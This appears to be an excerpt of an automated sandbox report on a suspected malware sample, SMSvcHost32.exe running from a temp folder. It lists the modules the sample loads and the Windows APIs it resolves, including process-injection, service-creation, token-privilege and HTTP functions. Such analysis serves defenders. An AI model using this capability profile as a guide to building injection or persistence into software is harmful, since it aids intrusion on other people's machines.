| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 |
Module (764)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | WININET.dll | base_address = 0x702b0000 |
|
1 | |
| Load | PSAPI.DLL | base_address = 0x772c0000 |
|
1 | |
| Load | USERENV.dll | base_address = 0x701e0000 |
|
1 | |
| Load | WINHTTP.dll | base_address = 0x70210000 |
|
1 | |
| Load | NETAPI32.dll | base_address = 0x77490000 |
|
1 | |
| Load | Secur32.dll | base_address = 0x6ff60000 |
|
1 | |
| Load | SHELL32.dll | base_address = 0x75120000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x77960000 |
|
5 | |
| Load | WinSCard.dll | base_address = 0x6fff0000 |
|
1 | |
| Load | CRYPT32.dll | base_address = 0x77050000 |
|
1 | |
| Load | WINMM.dll | base_address = 0x6fee0000 |
|
1 | |
| Load | powrprof.dll | base_address = 0x74770000 |
|
1 | |
| Load | user32.dll | base_address = 0x77810000 |
|
1 | |
| Load | ADVAPI32.DLL | base_address = 0x74aa0000 |
|
1 | |
| Load | KERNEL32.DLL | base_address = 0x765a0000 |
|
1 | |
| Load | NETAPI32.DLL | base_address = 0x77490000 |
|
1 | |
| Load | USER32.DLL | base_address = 0x77810000 |
|
2 | |
| Load | iphlpapi.dll | base_address = 0x71d30000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x74aa0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\eappcfg.dll | base_address = 0x6ffa0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x765a0000 |
|
8 | |
| Get Handle | WININET.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\shlwapi.dll | base_address = 0x74b20000 |
|
2 | |
| Get Handle | PSAPI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\ntdll.dll | base_address = 0x77960000 |
|
40 | |
| Get Handle | USERENV.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\ws2_32.dll | base_address = 0x746c0000 |
|
2 | |
| Get Handle | WINHTTP.dll | base_address = 0x0 |
|
1 | |
| Get Handle | NETAPI32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x77810000 |
|
2 | |
| Get Handle | c:\windows\syswow64\advapi32.dll | base_address = 0x74aa0000 |
|
2 | |
| Get Handle | Secur32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\shell32.dll | base_address = 0x75120000 |
|
2 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x771d0000 |
|
2 | |
| Get Handle | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | base_address = 0x400000 |
|
5 | |
| Get Handle | c:\windows\syswow64\psapi.dll | base_address = 0x772c0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\gdi32.dll | base_address = 0x76f00000 |
|
1 | |
| Get Handle | WinSCard.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\wininet.dll | base_address = 0x702b0000 |
|
1 | |
| Get Handle | CRYPT32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\netapi32.dll | base_address = 0x77490000 |
|
1 | |
| Get Handle | c:\windows\syswow64\iphlpapi.dll | base_address = 0x71d30000 |
|
1 | |
| Get Handle | WINMM.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\userenv.dll | base_address = 0x701e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x76b60000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ntdll.dll | base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Get Handle | c:\windows\syswow64\ntdll.dll | base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Get Handle | c:\windows\syswow64\ntdll.dll | base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Get Handle | c:\windows\syswow64\ntdll.dll | base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
29 | |
| Get Handle | c:\windows\syswow64\ntdll.dll | base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Get Filename | Secur32.dll | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 260 |
|
1 | |
| Get Filename | WINMM.dll | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 260 |
|
1 | |
| Get Filename | WINMM.dll | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 520 |
|
1 | |
| Get Filename | c:\windows\syswow64\ntdll.dll | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
33 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77992bd0 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x765b1ba0 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x765c5eb0 |
|
3 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpQueryInfoA, address_out = 0x70351880 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetQueryOptionA, address_out = 0x70357d00 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetSetOptionA, address_out = 0x70351dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpAddRequestHeadersA, address_out = 0x7032c3f0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetCloseHandle, address_out = 0x7037d200 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpSendRequestA, address_out = 0x70378e60 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetConnectA, address_out = 0x703f0da0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetReadFile, address_out = 0x70337320 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpAddRequestHeadersW, address_out = 0x7032bec0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetOpenW, address_out = 0x70378490 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpOpenRequestW, address_out = 0x70330fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = PathFindFileNameW, address_out = 0x74b37a50 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCatW, address_out = 0x74b484a0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCpyW, address_out = 0x74b484e0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCmpIW, address_out = 0x74b34750 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCpyNW, address_out = 0x74b433f0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrStrA, address_out = 0x74b43570 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrDupW, address_out = 0x74b39060 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrStrIW, address_out = 0x74b381b0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrRChrW, address_out = 0x74b3d1c0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCmpW, address_out = 0x74b35fe0 |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = GetProcessImageFileNameA, address_out = 0x772c16a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = _chkstk, address_out = 0x779da570 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlAllocateHeap, address_out = 0x77992bd0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlFreeHeap, address_out = 0x77990230 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = memset, address_out = 0x779dcfe0 |
|
1 | |
| Get Address | c:\windows\syswow64\userenv.dll | function = CreateEnvironmentBlock, address_out = 0x701e4480 |
|
1 | |
| Get Address | c:\windows\syswow64\userenv.dll | function = GetProfilesDirectoryW, address_out = 0x701e45a0 |
|
1 | |
| Get Address | c:\windows\syswow64\userenv.dll | function = DestroyEnvironmentBlock, address_out = 0x701e4510 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 52, address_out = 0x746f1110 |
|
2 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 2, address_out = 0x746d3230 |
|
2 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 3, address_out = 0x746cead0 |
|
2 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 11, address_out = 0x746c5240 |
|
2 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 23, address_out = 0x746ce6b0 |
|
2 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 15, address_out = 0x746c4a90 |
|
2 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 115, address_out = 0x746c6520 |
|
2 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpQueryDataAvailable, address_out = 0x702347a0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpReceiveResponse, address_out = 0x7021c8e0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpOpen, address_out = 0x70246720 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpAddRequestHeaders, address_out = 0x70229400 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpQueryHeaders, address_out = 0x702309c0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpReadData, address_out = 0x70234ea0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpOpenRequest, address_out = 0x70248dd0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpSetOption, address_out = 0x702306f0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpCloseHandle, address_out = 0x70233ad0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpSendRequest, address_out = 0x7023bfd0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpConnect, address_out = 0x70242880 |
|
1 | |
| Get Address | c:\windows\syswow64\netapi32.dll | function = NetApiBufferFree, address_out = 0x6ff916d0 |
|
2 | |
| Get Address | c:\windows\syswow64\netapi32.dll | function = NetUserGetInfo, address_out = 0x6ff733a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtectEx, address_out = 0x765e2790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAllocEx, address_out = 0x765e2730 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsBadReadPtr, address_out = 0x765b2510 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x765baba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateMutexW, address_out = 0x765c66f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateToolhelp32Snapshot, address_out = 0x765c7b50 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32NextW, address_out = 0x765bd290 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32FirstW, address_out = 0x765bf5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetExitCodeThread, address_out = 0x765c4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteProcessMemory, address_out = 0x765e2850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalMemoryStatusEx, address_out = 0x765bafe0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenMutexW, address_out = 0x765c6770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x765b2ad0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersionExW, address_out = 0x765baa80 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageA, address_out = 0x765bf830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpiA, address_out = 0x765b7830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileAttributesW, address_out = 0x765c6a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MoveFileExW, address_out = 0x765bb2b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileW, address_out = 0x765c6ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x765b7970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x765b3690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEnvironmentVariableA, address_out = 0x765e22f0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemInfo, address_out = 0x765ba0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x765c0160 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x765ba8a0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileTime, address_out = 0x765c6a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTime, address_out = 0x765c4940 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SystemTimeToFileTime, address_out = 0x765c4c10 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileSize, address_out = 0x765c6a70 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x765c68c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x765c68e0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x765c6c00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointer, address_out = 0x765c6c40 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileTime, address_out = 0x765c6c60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtect, address_out = 0x765b7a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x765b38c0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x765bcd50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x765c5100 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForMultipleObjects, address_out = 0x765c6800 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteAtom, address_out = 0x765bcb20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x765b8c80 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x765c6820 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779c7a80 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x765b99f0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalAddAtomW, address_out = 0x765b1be0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x765b8bf0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ProcessIdToSessionId, address_out = 0x765b8fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x765b7990 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x765b3870 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryA, address_out = 0x765c4bf0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x765c6630 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x765b9b90 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x765b78b0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindAtomW, address_out = 0x765b20f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x765b23e0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x765b7710 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x765bb000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x765b9bc0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibrary, address_out = 0x765b9f50 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetExitCodeProcess, address_out = 0x765bfdb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x765b9fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringA, address_out = 0x765bfde0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyA, address_out = 0x765bea30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x765c7b30 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetProcessPriorityBoost, address_out = 0x765bfef0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetPriorityClass, address_out = 0x765b9e90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x765b9b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadPriority, address_out = 0x765b9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentVariableW, address_out = 0x765b9970 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x765b75f0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatW, address_out = 0x765dd170 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalAlloc, address_out = 0x765b9950 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalFree, address_out = 0x765bccf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x765b79a0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x765dd260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x765bcc30 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x765c6bb0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEnvironmentVariableW, address_out = 0x765be9e0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempPathW, address_out = 0x765c6b30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x765c6890 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempFileNameW, address_out = 0x765c6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x765b7a30 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x7798efe0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualFree, address_out = 0x765b7600 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x765b7810 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RemoveDirectoryW, address_out = 0x765c6bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x765c6ca0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x765c6640 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DisconnectNamedPipe, address_out = 0x765e0990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x765c69b0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x765baaf0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x765c66b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameW, address_out = 0x765c46a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x765b3880 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameA, address_out = 0x765bfbf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetShortPathNameW, address_out = 0x765b2b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileW, address_out = 0x765c6960 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileW, address_out = 0x765c69a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfW, address_out = 0x7783f890 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x778404a0 |
|
2 | |
| Get Address | c:\windows\syswow64\user32.dll | function = ExitWindowsEx, address_out = 0x77879430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetShellWindow, address_out = 0x7782ff50 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetForegroundWindow, address_out = 0x77848cb0 |
|
3 | |
| Get Address | c:\windows\syswow64\user32.dll | function = TranslateMessage, address_out = 0x7782d9b0 |
|
2 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetWindowThreadProcessId, address_out = 0x7782da50 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameA, address_out = 0x74ac2910 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74abf590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = DuplicateTokenEx, address_out = 0x74ac0ad0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetLengthSid, address_out = 0x74abf570 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CreateProcessAsUserW, address_out = 0x74ac2c10 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = FreeSid, address_out = 0x74ac0440 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74abf520 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExA, address_out = 0x74ac0a20 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AllocateAndInitializeSid, address_out = 0x74abf660 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetTokenInformation, address_out = 0x74ac3840 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyA, address_out = 0x74ac09d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74abf620 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = ConvertSidToStringSidW, address_out = 0x74abf060 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueA, address_out = 0x74ad4dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74ac0980 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74abf330 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteValueW, address_out = 0x74ac0fb0 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74abf350 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = InitializeAcl, address_out = 0x74abfa80 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = InitializeSecurityDescriptor, address_out = 0x74abfc00 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AddAce, address_out = 0x74ac1ee0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74abf7f0 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetKeySecurity, address_out = 0x74ad7830 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyExW, address_out = 0x74abfa20 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetAce, address_out = 0x74ac2550 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetAclInformation, address_out = 0x74ac2570 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegGetKeySecurity, address_out = 0x74ac4190 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSecurityDescriptorDacl, address_out = 0x74abfc50 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetSecurityDescriptorDacl, address_out = 0x74abf830 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExA, address_out = 0x74abf790 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CheckTokenMembership, address_out = 0x74abfb50 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CreateWellKnownSid, address_out = 0x74ac0af0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSidSubAuthority, address_out = 0x74ac0ab0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSidSubAuthorityCount, address_out = 0x74ac0eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExA, address_out = 0x74abf500 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x74ac3ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetEntriesInAclW, address_out = 0x74ac2bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetFileSecurityW, address_out = 0x74ac41d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74abfaa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameW, address_out = 0x74ac1030 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = StartServiceW, address_out = 0x74ac4210 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenSCManagerW, address_out = 0x74ac0ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CloseServiceHandle, address_out = 0x74ac0960 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CreateServiceW, address_out = 0x74ad65d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetServiceStatus, address_out = 0x74ac0fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegisterServiceCtrlHandlerW, address_out = 0x74ac12f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = StartServiceCtrlDispatcherW, address_out = 0x74ac12b0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyA, address_out = 0x74ac2500 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74abf370 |
|
2 | |
